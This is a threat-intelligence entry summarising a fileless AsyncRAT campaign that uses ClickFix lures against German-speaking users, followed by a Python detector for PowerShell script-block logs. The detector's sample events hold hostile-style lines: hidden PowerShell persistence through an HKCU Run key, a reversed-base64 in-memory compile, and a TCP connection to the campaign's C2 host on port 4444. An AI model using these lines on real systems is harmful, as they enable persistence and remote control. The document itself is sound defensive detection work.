Fileless AsyncRAT Distributed via ClickFix Technique Targeting German-Speaking Users
ID: c422ced6-1e1f-51e3-940a-459a6df76bbc
STIX ID: report--c422ced6-1e1f-51e3-940a-459a6df76bbc
Feed Name: CloudSEK Blog
This report describes a targeted, fileless AsyncRAT campaign that uses a ClickFix-themed web page to trick German-speaking users into executing an obfuscated PowerShell command. That command downloads a C# loader stored reversed and base64-encoded, decodes it, and compiles it in memory with Add-Type, so the loader never lands on disk as a file. The payload persists through HKCU registry keys and opens a TCP reverse shell to namoet.de:4444 for remote control and credential theft. The report provides extensive IOCs and YARA rules for detection and recommends blocking suspicious PowerShell execution, monitoring registry changes, and scanning process memory.
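The chain summarised above (reversed base64 text, in-memory Add-Type compile, HKCU Run-key persistence, TCP reverse shell) leaves a recognisable footprint in PowerShell ScriptBlock logging (Event ID 4104). The Python script below is an added example written for this page, not code from the CloudSEK report: it runs heuristic rules over constructed 4104-style script-block text and additionally tries to decode any long base64-looking literal both as-is and reversed, flagging it when the result looks like C# source. It assumes the loader's base64 text is reversed character-wise before decoding (the report says "reversed, base64-encoded" without fixing the order), takes the namoet.de C2 host from the report's IOCs, and uses a constructed C# stub and constructed sample events; the indicator names and thresholds are the example's own.

```python
import base64
import binascii
import re

# Constructed C# stub standing in for the loader; the report's real loader is not reproduced.
_STUB_CSHARP = "using System; public class Loader { public static void Run() { } }"
# Assumption: base64 text is reversed character-wise, then reversed back before decoding.
_REVERSED_B64 = base64.b64encode(_STUB_CSHARP.encode())[::-1].decode()

# Constructed sample script-block entries in the style of Event ID 4104 (not real telemetry).
SAMPLE_EVENTS = {
    "evt-1": "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }",
    "evt-2": (
        f"$r='{_REVERSED_B64}';$c=$r.ToCharArray();[array]::Reverse($c);"
        "$src=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(-join $c));"
        "Add-Type -TypeDefinition $src;[Loader]::Run()"
    ),
    "evt-3": (
        "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
        "-Name Updater -Value 'powershell.exe -w hidden -ep bypass -File C:\\Users\\Public\\u.ps1'"
    ),
    "evt-4": "$t=New-Object System.Net.Sockets.TcpClient('namoet.de',4444);$s=$t.GetStream()",
    "evt-5": "Add-Type -AssemblyName System.Windows.Forms",
}

# Indicator rules keyed by name. Each one covers one stage of the chain described in the report.
INDICATORS = {
    "inmem_compile": re.compile(r"Add-Type\s+-TypeDefinition", re.I),       # C# compiled in memory
    "b64_decode": re.compile(r"FromBase64String", re.I),                     # payload decoding
    "string_reverse": re.compile(r"\[array\]::Reverse|\.ToCharArray\(\)", re.I),  # de-obfuscation
    "tcp_client": re.compile(r"Net\.Sockets\.TcpClient", re.I),              # raw TCP reverse shell
    "hkcu_run": re.compile(r"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", re.I),
    "known_c2": re.compile(r"namoet\.de", re.I),                             # C2 host from the report's IOCs
}
_B64_LITERAL = re.compile(r"[A-Za-z0-9+/=]{40,}")


def _looks_like_csharp(data: bytes) -> bool:
    text = data.decode("utf-8", errors="ignore")
    return "using System" in text or "class " in text


def decode_embedded_csharp(block: str):
    """Try each long base64-looking literal as-is and reversed.

    Returns (orientation, source) for the first literal that decodes to C#-looking
    text, or None. Strict decoding rejects the reversed form (leading '=' padding),
    so a hit on "reversed" means the literal only made sense after un-reversing it.
    """
    for lit in _B64_LITERAL.findall(block):
        for orientation, candidate in (("as-is", lit), ("reversed", lit[::-1])):
            try:
                data = base64.b64decode(candidate, validate=True)
            except (binascii.Error, ValueError):
                continue
            if _looks_like_csharp(data):
                return orientation, data.decode("utf-8", errors="ignore")
    return None


def analyze(block: str) -> dict:
    """Return the indicator hits for one script-block entry."""
    hits = {name: True for name, rx in INDICATORS.items() if rx.search(block)}
    decoded = decode_embedded_csharp(block)
    if decoded:
        orientation, src = decoded
        hits["decoded_csharp"] = orientation
        hits["decoded_preview"] = src[:40]
    return hits


def verdict(hits: dict) -> str:
    """Collapse hits into a triage label. A recovered C# payload or the known C2
    host is conclusive; otherwise two or more chain stages together are suspicious
    and a single stage (e.g. a lone Run-key write) is queued for review."""
    if "decoded_csharp" in hits or "known_c2" in hits:
        return "malicious"
    strong = {"inmem_compile", "b64_decode", "string_reverse", "tcp_client", "hkcu_run"}
    n = len(strong & set(hits))
    if n >= 2:
        return "suspicious"
    if n == 1:
        return "review"
    return "benign"


def triage(events: dict) -> dict:
    """Map event id -> verdict for a batch of script-block entries."""
    return {eid: verdict(analyze(text)) for eid, text in events.items()}


if __name__ == "__main__":
    for eid, label in triage(SAMPLE_EVENTS).items():
        print(f"{eid}: {label} {analyze(SAMPLE_EVENTS[eid])}")
```

The reversed-decode step is what separates this from a plain keyword match: a campaign that renames its variables or drops `[array]::Reverse` in favour of another reversal idiom still has to ship base64 text that becomes C# once un-reversed, and that is what `decode_embedded_csharp` keys on. Feed it the `ScriptBlockText` field of 4104 events (or the command line from 4688/Sysmon process creation) rather than a single line, since the campaign's command is pasted as one block.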
